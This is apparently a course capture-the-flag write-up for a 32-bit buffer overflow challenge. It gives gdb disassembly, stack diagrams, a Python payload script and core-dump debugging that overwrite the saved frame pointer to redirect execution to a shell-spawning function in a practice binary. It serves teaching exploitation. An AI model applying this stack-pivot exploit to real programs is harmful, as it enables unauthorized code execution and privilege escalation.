# CANDL: unit02/bof-level5

To check the positions of variables at the stack accurately, let's take a look
at the disassembly of `receive_input()`.

```
kxj190011@ctf-vm1.utdallas.edu:/home/kxj190011/unit2/bof-level5 $ gdb bof-level5
$ gdb ./bof-level5

Reading symbols from bof-level5...(no debugging symbols found)...done.
pwndbg> disassemble receive_input
Dump of assembler code for function receive_input:
   0x08048558 <+0>:     push   %ebp
   0x08048559 <+1>:     mov    %esp,%ebp
   0x0804855b <+3>:     sub    $0x88,%esp
   0x08048561 <+9>:     sub    $0x4,%esp
   0x08048564 <+12>:    push   $0x84                      <-- 3rd arg, at 0x8(%esp)
   0x08048569 <+17>:    lea    -0x80(%ebp),%eax           <-- 2nd,-0x80(%ebp)
   0x0804856c <+20>:    push   %eax                       <-- 2nd arg, at 0x4(%esp)
   0x0804856d <+21>:    push   $0x0                       <-- 1st arg, at (%esp)
   0x0804856f <+23>:    call   0x8048390 <read@plt>
   0x08048574 <+28>:    add    $0x10,%esp
   0x08048577 <+31>:    nop
   0x08048578 <+32>:    leave
   0x08048579 <+33>:    retl
End of assembler dump.
```

Try `man read` to see the function signature of *read()* is,

```
NAME
       read - read from a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void *buf, size_t count);

-> read(0, %ebp-0x80, 0x84),
```

and from the assembly, the buffer is at %ebp-0x80. And we can write 132 (0x84)
bytes. We can draw the stack as follows:

```
[      buffer - %ebp-0x80      ][saved ebp][ret addr]
\__________128 bytes___________/\_4 bytes_/\_4bytes_/
 \_______________132 bytes_______________/
```

We can overwrite the saved %ebp but not the return address.

So what we will do is, we will change the value of saved %ebp at `leave-retl` of
`receive_input()`, and finally change the return address of `run()`, which is the
caller of `receive_input()`, for its `leave-retl`.


Before doing this, let's recap on leave and ret.

```
leave:
  mov %ebp, %esp    <-- set %esp as the same value as %ebp
  pop %ebp          <-- set %ebp as the value of (%esp), and add $4, %esp.

ret:
  pop %eip          <-- set the instruction pointer as the value of (%esp),
                        and add $4, %esp.
```


And, if we execute `leave-retl` twice,

* 1st round
```
leave:
  %esp = %ebp+4
  %ebp = %saved_ebp

ret:
  %eip = (%esp)
```

Now our %ebp is %saved_ebp, and `leave-retl` again.

* 2nd round
```
leave:
  %esp = %ebp+4 = %saved_ebp+4
  %ebp = (%ebp) = (%saved_ebp)

ret-2:
  %eip = (%esp) = (%saved_ebp+4)
```

(Please refer to the slide W2L2 for the animation of the stack operation if you
cannot follow the change of %ebp and %esp)

So, at the 2nd return, the CPU will use the value at the address of
%saved_ebp+4 as the return address (i.e., jump to the value of %saved_ebp+4).


Let's do a simple math.
(%saved_ebp + 4) = return address
%saved_ebp + 4 = the address that stores return address
%saved_ebp = the address that stores return address - 4

And we can overwrite %saved_ebp.

So what we need to do at this stack:

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
 \_______________132 bytes_______________/
```

Thus is to fill 128 bytes for the buffer, and fill the remaining 4 bytes of 132
bytes as [the address of return address] - 4.

Then, where can we find the address of return address? Let's first check where
do we want to return (the get_a_shell() function).

```
pwndbg$ info functions
...
0x0804850b  get_a_shell
```

Yes, it is at 0x804850b.

Then, would the value be 0x804850b-4 = 0x8048507? NOOOOOOOO. We need to know the
address that stores 0x804850b. Is there any place in the program? No, definitely
not.

Then, where can we find the address? To find that easily, let's think about the
memory that we can control.

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
 \_______________132 bytes_______________/
  --- OUR INPUTS (CONTROLLABLE) HERE  ---
````

In the stack, we can control the 132 bytes starting from the buffer. Although we
must put some calculated value for the last 4 bytes (for %saved_ebp), we can
freely set the first 128 bytes of our input.

Then, let's get the address of our buffer. We can easily do this by setting a
break point before the leave instruction in receive_input, and check the
buffer's location by inspecting %ebp-0x80.

1. Open gdb and disassemble receive_input
```
  pwndbg$ disas receive_input
  Dump of assembler code for function receive_input:
     0x08048558 <+0>:	push   %ebp
     0x08048559 <+1>:	mov    %esp,%ebp
     0x0804855b <+3>:	sub    $0x88,%esp
     0x08048561 <+9>:	sub    $0x4,%esp
     0x08048564 <+12>:	push   $0x84
     0x08048569 <+17>:	lea    -0x80(%ebp),%eax
     0x0804856c <+20>:	push   %eax
     0x0804856d <+21>:	push   $0x0
     0x0804856f <+23>:	call   0x8048390 <read@plt>
     0x08048574 <+28>:	add    $0x10,%esp
     0x08048577 <+31>:	nop
     0x08048578 <+32>:	leave                          <-- LEAVE at +32
     0x08048579 <+33>:	ret
  End of assembler dump.
  ```

2. Set a break point at receive_input + 32
  ```
  pwndbg$ b *receive_input+32
  Breakpoint 1 at 0x8048578
  ```

3. run
  ```
  pwndbg$ r
  ```


In our tutorial example, I typed '1234' as the content of buffer.
And let's check where the buffer is:

  ```
  pwndbg$ x/x $ebp-0x80
  0xffffd578:	0x34333231
  ```

Yes, our buffer starts at the address 0xffffd578,
and as we expect, the buffer contains 0x34333231, which is "1234".

So if we set the saved_ebp as 0xffffd578, we can make CPU to
use some values from our input to manage the stack
(and we will change the return address by doing this!)

Then, what values do you want to set?

First, we need to set saved_ebp as the address of our buffer, 0xffffd578.

```
 /--- pointed by %saved %ebp, e.g., 0xffffd578
v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
                                  \_____saved_ebp____/
                                  little endian of 0xffffd578.
```

Then, we will fill the buffer as follows:

```
"xxxx" + "\x0b\x85\x04\x08" + "zzzz" * ((128/4)-2)        + "\x78\xd5\xff\xff"
new_ebp   (return_address)     others (to fill 128 bytes)    (start_of_buffer)
\__________________________128 bytes______________________/ \____saved_ebp____/
```


Then at the 2nd return, the CPU will return to %saved_ebp+4, which is
0xffffd57c. Our buffer will look like this:

```
/--- pointed by %saved %ebp, e.g., 0xffffd578
|     /------- 0xffffd57c, contains RET = 0x804850b = get_a_shell()
v    v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
\_4_/\_4_/\_4_/\_4_/\_4_/....\_4_/\________4_________/
\_____________128______________/          /
 \___________________132_________________/
```

and RET will be 0x804850b (address of get_a_shell()), in little endian:
`\x0b\x85\x04\x08`.

then the CPU will return to get_a_shell by the following steps:

1. Before the first leave at receive_input.

```
/----- pointed by %esp
|                                                /---- pointed by %ebp
v                                                v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
```

2. After the first leave
```
                                                                     /----- pointed by %esp
               /---- pointed by %ebp                                 |
               v                                                     v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
                \--- address 0xffffd578
```


3. Return of the receive_input() (before 2nd leave in run())

```
                                                                                        /----- pointed by %esp
               /---- pointed by %ebp                                                    |
               v                                                                        v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578

```

4. 2nd leave in run()

* %ebp now points to xxxx...

```
                    /----- pointed by %esp
                    |
                    v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

5. return in run()

* pop [RET], so runs the return address of our choice.

```
                         /----- pointed by %esp
                         |
                         v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```


Then the CPU will run get_a_shell() pointed by RET!


To make that input, let's create a python script.

```python=
#!/usr/bin/env python

with open('input.txt','wb') as f:
    f.write("xxxx" + "\x0b\x85\x04\x08" + "aaaa" * (128/4 - 2) + "\x78\xd5\xff\xff")
```


If you run the script, you will get input.txt as:
```
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 78d5 ffff      x...
```

Let's run that in gdb, with a breakpoint at the first leave.

```
pwndbg$ b *receive_input +32
Note: breakpoint 1 also set at pc 0x8048578.
Breakpoint 2 at 0x8048578
pwndbg$ r < input.txt
```

Let's do 'ni',

After the first leave, you can observe:
```
EBP: 0xffffd578 --> ("xxxx\v\205\004\b", 'a' <repeats 120 times>, (seems buffer)
ESP: 0xffffd5fc --> 0x80485b5 (<run+59>:	nop)
```


Let's do three 'ni's again, until we execute 2nd leave in the run()

Now,

```
EBP: 0x78787878 ('xxxx')
ESP: 0xffffd57c --> 0x804850b (<get_a_shell>:	push   %ebp)
```

ESP is pointing an address that contains the start of get_a_shell(),
so if we execute 'ret', then it will run get_a_shell()!

press 'c' to continue!


```
pwndbg$ c
Continuing.
Spawning a privileged shell
process 7252 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
[Inferior 1 (process 7252) exited normally]
```

Yes, we can execute the shell...

Then let's try the following command (and also press few enter keys):
```
$ (cat input.txt; cat) | ./bof-level5
```

Now we have a buffer overflow vulnerability, but the vulnerability cannot reach
to the return address... Can you exploit this program?

Segmentation fault (core dumped)

Un oh, our exploit does not work.

Why? It's because the environment in gdb differs from the actual environment of
running of a program outside gdb.

We need to match that difference, and the difference can easily be observed in
the core file, which is generated by that "(core dumped)" message.

A core file contains a snapshot of memory space of a program when the program
crashes. So we can find an exact address of our environment by inspecting the
core file.

Let's open the core file using 'gdb'.

$ gdb --core=core
[New LWP 7261]

warning: Unexpected size of section `.reg-xstate/7261' in core file.
Core was generated by `./bof-level5'.
Program terminated with signal SIGSEGV, Segmentation fault.

warning: Unexpected size of section `.reg-xstate/7261' in core file.
#0  0x61616161 in ?? ()


It seems that the program got a fault at the address 0x61616161,
and 0x61616161 is "aaaa", which seems some of our input
(we put "xxxx" + "get_a_shell()" + )

Let's check our stack.

```
pwndbg$ x/100xw $esp
0xffffd580:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd590:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5a0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5b0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5c0:	0x61616161	0x61616161	0xffffd578	0x080485b5   <-- 0xffffd578 is the address that we typed
0xffffd5d0:	0x00000001	0xffffd694	0xffffd5e8	0x080485ce
0xffffd5e0:	0xf7fb43dc	0xffffd600	0x00000000	0xf7e1a637
0xffffd5f0:	0xf7fb4000	0xf7fb4000	0x00000000	0xf7e1a637
0xffffd600:	0x00000001	0xffffd694	0xffffd69c	0x00000000
0xffffd610:	0x00000000	0x00000000	0xf7fb4000	0xf7ffdc04
0xffffd620:	0xf7ffd000	0x00000000	0xf7fb4000	0xf7fb4000
0xffffd630:	0x00000000	0xdecab371	0xe22d5d61	0x00000000
0xffffd640:	0x00000000	0x00000000	0x00000001	0x08048410
0xffffd650:	0x00000000	0xf7fee010	0xf7fe8880	0xf7ffd000
0xffffd660:	0x00000001	0x08048410	0x00000000	0x08048431
0xffffd670:	0x080485b8	0x00000001	0xffffd694	0x080485e0
0xffffd680:	0x08048640	0xf7fe8880	0xffffd68c	0xf7ffd918
0xffffd690:	0x00000001	0xffffd7c8	0x00000000	0xffffd7d5
0xffffd6a0:	0xffffd7e5	0xffffd7f0	0xffffd7fb	0xffffd80e
0xffffd6b0:	0xffffd81b	0xffffdda3	0xffffddb6	0xffffddc4
0xffffd6c0:	0xffffddd2	0xffffdde9	0xffffde5f	0xffffde88
0xffffd6d0:	0xffffde99	0xffffdf06	0xffffdf0e	0xffffdf2b
0xffffd6e0:	0xffffdf44	0xffffdf54	0xffffdf74	0xffffdf82
0xffffd6f0:	0xffffdf99	0xffffdfbb	0xffffdfca	0x00000000
0xffffd700:	0x00000020	0xf7fd7fe0	0x00000021	0xf7fd7000
```


Right now, our focus is to find the start address of the buffer.
Because we cannot see the starting point ("xxxx", which is 0x78787878),
let's move the printing index further below, say $esp-0x100.


```
pwndbg$ x/100xw $esp-0x100
0xffffd480:	0xffffd540	0xf7fe2b4b	0x0804820c	0xffffd4f8
0xffffd490:	0xf7ffda74	0x00000001	0xf7fd34a0	0x00000001
0xffffd4a0:	0xf7fe2a70	0x080481dc	0x00000001	0xf7ffd918
0xffffd4b0:	0x0804a00c	0xf7fe78a2	0xf7ffdad0	0xf7fd34a0
0xffffd4c0:	0x00000001	0x00000001	0x00000000	0xf7e6b0b1
0xffffd4d0:	0x00000001	0x0804b008	0x0000001e	0x08048295
0xffffd4e0:	0xf7ffd000	0x0804826c	0xf7e0edc8	0xf7fb4d60
0xffffd4f0:	0x0000000a	0xf7e09b08	0xffffd5b8	0xf7e6a3e4
0xffffd500:	0xf7fe77eb	0x00000000	0xf7fb4000	0xf7fb4000
0xffffd510:	0xffffd5c8	0xf7fee010	0xffffd5c8	0x00000084
0xffffd520:	0xffffd548	0xf7ed7b23	0x00000000	0x08048574
0xffffd530:	0x00000000	0xffffd548	0x00000084	0xf7e6c47b
0xffffd540:	0xf7fb4d60	0x0804b008	0x78787878	0x0804850b   <-- here is our buffer! 0x78787878!!!
0xffffd550:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd560:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd570:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd580:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd590:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5a0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5b0:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd5c0:	0x61616161	0x61616161	0xffffd578	0x080485b5
0xffffd5d0:	0x00000001	0xffffd694	0xffffd5e8	0x080485ce
0xffffd5e0:	0xf7fb43dc	0xffffd600	0x00000000	0xf7e1a637
0xffffd5f0:	0xf7fb4000	0xf7fb4000	0x00000000	0xf7e1a637
0xffffd600:	0x00000001	0xffffd694	0xffffd69c	0x00000000
```


See the line below:
```
0xffffd540:	0xf7fb4d60	0x0804b008	0x78787878	0x0804850b   <-- here is our buffer! 0x78787878!!!
```

Our buffer starts (0x78787878) in the middle of line,
so we can infer the address is 0xffffd540 + 8 (two integers between the start
and 0x78787878), so it is 0xffffd548.

Let's adjust our address in the script then.

```python
#!/usr/bin/env python

with open('input.txt','wb') as f:
    f.write("xxxx" + "\x0b\x85\x04\x08" + "aaaa" * (128/4 - 2) + "\x48\xd5\xff\xff")
```


and running this script and print input.txt:
```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 48d5 ffff
```

Yes, now the saved %ebp points to 0xffffd548.

And you can get the flag by running the following commands:

```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ (cat input.txt;cat) | ./bof-level5
Now we have a buffer overflow vulnerability,
hbut the vulnerability cannot reach to the return address...
Can you exploit this program?
Spawning a privileged shell
$ id
uid=1006(red9057) gid=50205(unit2-level5-ok) groups=50205(unit2-level5-ok),1006(red9057)
$ cat flag
candl{???SCRAMBLED???}
```